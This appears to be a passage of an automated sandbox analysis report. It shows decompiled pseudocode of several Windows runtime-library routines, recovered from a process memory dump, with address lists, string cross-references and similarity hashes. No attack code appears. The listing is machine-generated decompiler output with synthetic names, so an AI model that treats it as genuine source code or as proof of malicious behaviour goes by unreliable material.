																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E011C76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E011C76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L011EFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L011C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E011EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E011EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E011EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E011EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E011EFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x12a7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x12a7b84 = _t75;
						_t73 = E011CEB70(_t134, 0x12a7b60);
						if( *0x12a7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E011CFF60( *0x12a7b20);
							}
						}
						goto L5;
					}
				}
			}

0x011efab0
0x011efab2
0x011efab3
0x011efab4
0x011efabc
0x011efac0
0x011efb14
0x011efb17
0x011efac2
0x011efac8
0x011efacd
0x011efad3
0x011efad3
0x011efadd
0x011efb18
0x011efb1b
0x011efb1d
0x011efb1e
0x011efb1f
0x011efb20
0x011efb21
0x011efb22
0x011efb23
0x011efb24
0x011efb25
0x011efb26
0x011efb27
0x011efb28
0x011efb29
0x011efb2a
0x011efb2b
0x011efb2c
0x011efb2d
0x011efb2e
0x011efb2f
0x011efb3a
0x011efb3b
0x011efb3e
0x011efb41
0x011efb44
0x011efb47
0x011efb4a
0x011efb4d
0x011efb53
0x0122bdcb
0x0122bdcb
0x011efb59
0x011efb5b
0x011efb5b
0x011efb5e
0x0122bdd5
0x0122bdd8
0x00000000
0x0122bdda
0x00000000
0x0122bdda
0x011efb64
0x011efb64
0x011efb64
0x011efb67
0x011efb6e
0x011efb70
0x011efb72
0x00000000
0x011efb78
0x011efb7a
0x011efb7a
0x011efb7d
0x011efb80
0x0122bddf
0x0122bde1
0x00000000
0x0122bde3
0x00000000
0x0122bde3
0x011efb86
0x011efb86
0x011efb86
0x011efb8b
0x011efb90
0x011efb92
0x011efb94
0x011efb9a
0x011efb9b
0x011efba1
0x0122bde8
0x0122bdeb
0x0122bded
0x0122beb5
0x0122beb5
0x0122bebb
0x0122bebd
0x0122bec3
0x0122bed2
0x0122bedd
0x0122bedd
0x0122beed
0x00000000
0x0122bdf3
0x0122bdfe
0x0122be06
0x0122be0b
0x0122be0d
0x0122be0f
0x0122be14
0x0122be19
0x0122be20
0x0122be25
0x0122be27
0x0122be35
0x0122be39
0x0122be46
0x0122be4f
0x0122be54
0x0122be56
0x0122bef8
0x0122bef8
0x00000000
0x0122be5c
0x0122be5c
0x0122be60
0x00000000
0x0122be66
0x0122be66
0x0122be7f
0x0122be84
0x0122be87
0x0122be89
0x0122be8b
0x0122be99
0x0122be9d
0x0122bea0
0x0122beac
0x0122beaf
0x0122beb1
0x0122beb3
0x0122beb3
0x00000000
0x0122bea2
0x0122bea2
0x00000000
0x0122bea2
0x0122be8d
0x0122be8d
0x0122be92
0x00000000
0x0122be92
0x0122be8b
0x0122be60
0x0122be3b
0x0122be3b
0x0122be3e
0x00000000
0x0122be40
0x0122be40
0x0122be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0122be44
0x0122be3e
0x0122be29
0x0122be29
0x00000000
0x0122be29
0x0122be27
0x00000000
0x011efba7
0x011efba7
0x011efbab
0x0122bf02
0x011efbb1
0x011efbb1
0x011efbb8
0x011efbbd
0x011efbbd
0x011efbbf
0x011efbbf
0x011efbc5
0x011efbcb
0x011efbf8
0x011efbf8
0x011efbfa
0x00000000
0x011efc00
0x011efc00
0x011efc03
0x00000000
0x011efc09
0x011efc09
0x011efc0f
0x011efc15
0x011efc23
0x011efc23
0x011efc25
0x011efc27
0x011efc75
0x011efc7c
0x011efc84
0x00000000
0x011efc29
0x011efc29
0x011efc2d
0x011efc30
0x0122bf0f
0x00000000
0x011efc36
0x011efc38
0x011efc3b
0x011efc41
0x0122bf17
0x0122bf19
0x0122bf48
0x0122bf4b
0x00000000
0x0122bf1b
0x0122bf22
0x0122bf24
0x0122bf26
0x00000000
0x0122bf2c
0x0122bf37
0x0122bf39
0x0122bf3b
0x00000000
0x0122bf41
0x0122bf41
0x0122bf41
0x0122bf41
0x0122bf45
0x00000000
0x0122bf45
0x0122bf3b
0x0122bf26
0x00000000
0x011efc47
0x011efc47
0x011efc49
0x011efcb2
0x011efcb4
0x011efcb6
0x011efcdc
0x011efcdc
0x00000000
0x011efcb8
0x011efcc3
0x011efcc5
0x011efcc7
0x00000000
0x011efcc9
0x011efcc9
0x011efccd
0x00000000
0x011efccd
0x011efcc7
0x00000000
0x011efc4b
0x011efc4b
0x011efc4e
0x011efc4e
0x011efc51
0x011efc51
0x011efc54
0x011efc5a
0x011efc5c
0x011efc5f
0x011efc61
0x011efc63
0x011efc65
0x011efc67
0x011efc6e
0x011efc72
0x011efc72
0x011efc72
0x011efc72
0x011efc67
0x011efc61
0x00000000
0x011efc5a
0x011efc49
0x011efc41
0x011efc30
0x011efc27
0x011efc03
0x011efbcd
0x011efbd3
0x011efbd9
0x011efbdc
0x011efbde
0x011efc99
0x011efc9b
0x011efc9d
0x011efcd5
0x011efcd5
0x011efc89
0x011efc89
0x00000000
0x011efc9f
0x011efc9f
0x011efca3
0x00000000
0x011efca3
0x00000000
0x011efbe4
0x011efbe4
0x011efbe4
0x011efbe4
0x011efbe9
0x011efbf2
0x00000000
0x011efbf2
0x011efbde
0x011efbcb
0x011efbab
0x011efc8b
0x011efc8b
0x011efc8c
0x011efb80
0x011efb72
0x011efb5e
0x011efc8d
0x011efc91
0x011efadf
0x011efadf
0x011efae1
0x011efae4
0x011efae7
0x011efaec
0x011efaf8
0x011efb00
0x011efb07
0x011efb0f
0x011efb0f
0x011efb07
0x00000000
0x011efaf8
0x011efadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0122BE0F

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 884c189e2f207e31f60259e048dccf1a1e950b97f6055f37bf7e84ccb7608e28
Instruction ID: d846618d3c4f335024044f49bbff6e8e560decc8608a948014673dd1a624575e
Opcode Fuzzy Hash: 884c189e2f207e31f60259e048dccf1a1e950b97f6055f37bf7e84ccb7608e28
Instruction Fuzzy Hash: 2CA11871B10A179BEB29CFA8C458B7EB7E5AF44724F14456DEE06CB681DB30D802CB81

Uniqueness

Uniqueness Score: -1.00%

Function 011B2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E011B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x12a5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x12a7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E011F97C0();
				}
				if( *0x12a79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x12a79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E011E1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E011D7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0124FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E011F9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E011EE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0120DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x12a6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x12a6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E011F9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E011F95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E011D7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E011D7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01237016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0124FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x12a5350;
							if(_t109 != 0x12a5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0124FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01245720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x011b2d8a
0x011b2d8a
0x011b2d92
0x011b2d96
0x011b2d9e
0x011b2da0
0x011b2da3
0x011b2da5
0x011b2da8
0x011b2dab
0x011b2db2
0x0120f9aa
0x0120f9ab
0x0120f9ae
0x0120f9ae
0x011b2db8
0x011b2dc2
0x0120f9b9
0x0120f9be
0x0120f9bf
0x0120f9bf
0x011b2dcf
0x0120f9c9
0x011b2dd5
0x011b2dd5
0x011b2dd5
0x011b2dde
0x011b2de1
0x011b2e70
0x011b2e72
0x011b2e72
0x011b2de7
0x011b2deb
0x011b2e7c
0x011b2e83
0x011b2e85
0x011b2e8b
0x011b2e8d
0x011b2e92
0x011b2e92
0x011b2e85
0x011b2df1
0x011b2df7
0x011b2df9
0x011b2df9
0x011b2dfc
0x011b2dff
0x011b2e02
0x00000000
0x011b2e05
0x011b2e0c
0x0120f9d9
0x011b2e12
0x011b2e12
0x011b2e12
0x011b2e1a
0x0120f9e3
0x0120f9e9
0x0120f9f0
0x0120f9f6
0x0120f9f8
0x0120f9f8
0x0120f9f0
0x011b2e23
0x0120fa02
0x0120fa03
0x0120fa05
0x0120fa06
0x00000000
0x011b2e29
0x011b2e29
0x011b2e2e
0x011b2e34
0x011b2e3e
0x00000000
0x00000000
0x011b2e44
0x011b2e47
0x011b2e4d
0x00000000
0x00000000
0x011b2e4f
0x011b2e54
0x00000000
0x00000000
0x011b2e5a
0x011b2e5f
0x011b2e9a
0x011b2ea4
0x011b2ea5
0x011b2ea8
0x011b2eaf
0x011b2eb2
0x011b2eb5
0x0120fae9
0x0120faeb
0x0120faed
0x0120faef
0x0120faf7
0x0120faf8
0x0120fafd
0x0120faff
0x0120fb04
0x0120fb04
0x0120faff
0x011b2ec0
0x011b2ec4
0x011b2ec6
0x011b2ec8
0x0120fb14
0x0120fb18
0x0120fb1e
0x0120fb21
0x0120fb21
0x011b2ece
0x011b2ece
0x011b2ece
0x011b2ed7
0x011b2e61
0x011b2e63
0x0120fa6b
0x0120fa71
0x0120fa76
0x0120fa78
0x0120fa8a
0x0120fa7a
0x0120fa83
0x0120fa83
0x0120fa8f
0x0120fa91
0x0120fa97
0x0120fa9d
0x0120faa4
0x0120faaa
0x0120faaf
0x0120fab1
0x0120fac3
0x0120fab3
0x0120fabc
0x0120fabc
0x0120fac8
0x0120facb
0x0120fadf
0x0120fadf
0x0120facb
0x0120faa4
0x0120fa91
0x011b2e6f
0x011b2e6f
0x011b2e5f
0x0120fa13
0x0120fa15
0x0120fa17
0x0120fa1f
0x0120fa21
0x0120fa22
0x0120fa25
0x0120fa28
0x0120fa2f
0x0120fa2f
0x0120fa2a
0x0120fa2a
0x0120fa2a
0x0120fa31
0x0120fa34
0x0120fa36
0x0120fa3c
0x0120fa3e
0x0120fa41
0x0120fa43
0x0120fa45
0x0120fa45
0x0120fa41
0x0120fa3c
0x0120fa4a
0x0120fa4f
0x0120fa51
0x0120fa53
0x0120fa56
0x0120fa5b
0x0120fa5e
0x00000000
0x0120fa5e
0x011b2e23

Strings

RTL: Re-Waiting, xrefs: 0120FA4A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 4f4e0e49b26bdccdd1b1cc1e6d8a7e60ba1d75ddc1cb6477fbaa21edcf3a555a
Instruction ID: 265ec59b01da68ebc742e1ab742a9062571da02dd64991e36d3a16c3ebca5e0f
Opcode Fuzzy Hash: 4f4e0e49b26bdccdd1b1cc1e6d8a7e60ba1d75ddc1cb6477fbaa21edcf3a555a
Instruction Fuzzy Hash: 4C615731A506069FDB3BDF6CC984BBE7BA0EB44714F150769EA11972C2C734B945C782

Uniqueness

Uniqueness Score: -1.00%

Function 01280EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01280EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0127FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01281074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E011F9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0127A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0127A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x12a8b04 >> 0x14) + (_v44 -  *0x12a8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E011D7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0127138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E011D7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0126FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x12a8724 & 0x00000008) != 0) {
						E012752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E012815B5(0x12a8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01280eb7
0x01280eb9
0x01280ec0
0x01280ec2
0x01280ecd
0x0128105b
0x0128105b
0x01281061
0x01281066
0x01281066
0x0128106b
0x01281073
0x01281073
0x01280ed3
0x01280ed6
0x01280edc
0x01280ee0
0x01280ee7
0x01280ef0
0x01280ef5
0x01280efa
0x01280efc
0x01280efd
0x01280f03
0x01280f04
0x01280f06
0x01280f07
0x01280f09
0x01280f0e
0x01280f14
0x01280f23
0x01280f2d
0x01280f34
0x01280f34
0x01280f14
0x01280f52
0x00000000
0x00000000
0x01280f58
0x01280f73
0x01280f74
0x01280f79
0x01280f7d
0x01280f80
0x01280f86
0x01280fab
0x01280fb5
0x01280fc6
0x01280fd1
0x01280fe3
0x01280fd3
0x01280fdc
0x01280fdc
0x01280feb
0x01281009
0x01281009
0x01281015
0x01281027
0x01281017
0x01281020
0x01281020
0x0128102f
0x0128103c
0x0128103c
0x01281048
0x01281050
0x01281050
0x01281055
0x00000000
0x01281055
0x01280f88
0x01280f9e
0x01280fa2
0x01280fa9
0x00000000
0x00000000
0x00000000
0x01280fa9
0x00000000

Strings

`, xrefs: 01280F16

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: cec4271577805ed3d916bf3d002122631e30ee2e0af316c49d0aaea1b7ae1bd2
Instruction ID: 9b37db8c8f96b134c83b339a36645464a6492a8ceb11daff8bd5f1873d46fb68
Opcode Fuzzy Hash: cec4271577805ed3d916bf3d002122631e30ee2e0af316c49d0aaea1b7ae1bd2
Instruction Fuzzy Hash: 5B519F713153429FD325EF18D885B2BBBE5EB84714F04492CFA96972D1DA70E806CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011EF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E011EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E011D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E011F9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E011F9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E011F95D0();
							goto L11;
						} else {
							_t109 = L011D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E011FF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E011F95D0();
										L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x011ef0d3
0x011ef0d9
0x011ef0e0
0x011ef0e7
0x011ef0f2
0x011ef0f4
0x011ef0f8
0x011ef100
0x011ef108
0x011ef10d
0x011ef115
0x011ef116
0x011ef11f
0x011ef123
0x011ef124
0x011ef12c
0x011ef130
0x011ef134
0x011ef13d
0x011ef144
0x011ef14b
0x011ef152
0x0122bab0
0x0122bab0
0x011ef158
0x011ef158
0x011ef15a
0x011ef160
0x011ef165
0x011ef166
0x011ef16f
0x011ef173
0x0122baa7
0x0122baa7
0x0122baab
0x00000000
0x011ef179
0x011ef18d
0x011ef191
0x0122baa2
0x00000000
0x011ef197
0x011ef19b
0x011ef1a2
0x011ef1a9
0x011ef1af
0x011ef1b2
0x011ef1b6
0x011ef1b9
0x011ef1c4
0x011ef1d8
0x011ef1df
0x011ef1e3
0x011ef1eb
0x011ef1ee
0x011ef1f4
0x011ef20f
0x0122bab7
0x0122babb
0x0122bacc
0x0122bad1
0x011ef215
0x011ef218
0x011ef226
0x011ef22b
0x00000000
0x011ef22b
0x011ef1f6
0x011ef1f6
0x011ef1f9
0x011ef1fb
0x011ef1fb
0x011ef1f4
0x011ef191
0x011ef173
0x011ef152
0x011ef203

Strings

@, xrefs: 011EF124

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 6c7b13b0ae976d9d0f0d919969081a218434888a121ffe8fa9eb32693e881fbe
